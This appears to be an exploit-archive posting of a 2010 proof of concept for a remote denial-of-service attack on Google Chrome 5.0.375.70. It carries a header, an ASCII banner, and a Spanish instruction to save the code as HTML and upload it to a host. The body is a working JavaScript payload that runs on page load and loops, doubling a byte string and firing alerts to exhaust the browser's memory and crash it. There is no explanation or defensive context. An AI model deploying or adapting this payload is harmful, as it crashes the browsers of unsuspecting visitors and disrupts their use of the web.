Google Chrome 5.0.375.70 Remote Denial of Service PoC

2010-06-17 09:02:37

# Title: Google Chrome 5.0.375.70 Remote Dos
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PoisonCode
# Published: 2010-06-15
# Download Exploit Code
# Download Vulnerable app
# Title:Google Chrome 5.0.375.70 Remote Dos
# Software Link:http://www.google.es/chrome
# Version: 5.0.375.70
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/


Lo Guardamos como un html y lo subimos algun host

<body onload="javascript:bufov();"></body>

<script>

function bufov() {
var b = '\x00\x13\xFF\xC4\x7C\x92\x07\x38';
for (a =0;a<99999999999;a++) {
b+=b+'\x00\x13\xFF\xC4\x7C\x92\x07\x38';
alert('<html><marquee><h1>'+b+b);

}

}

</script>

Fixes

No fixes

In order to submit a new fix you need to be registered.